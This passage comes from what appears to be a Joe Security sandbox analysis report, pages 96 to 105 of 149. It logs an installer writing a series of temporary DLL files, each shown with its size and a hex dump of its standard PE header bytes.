unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 96 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp
unknown 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 97 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp
unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 98 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp
unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 99 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp
unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp
unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 100 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp
unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 101 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp
unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 102 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp
unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 103 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp
unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 e3 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp
unknown 22208 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 104 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 0a 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp
unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 105 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp
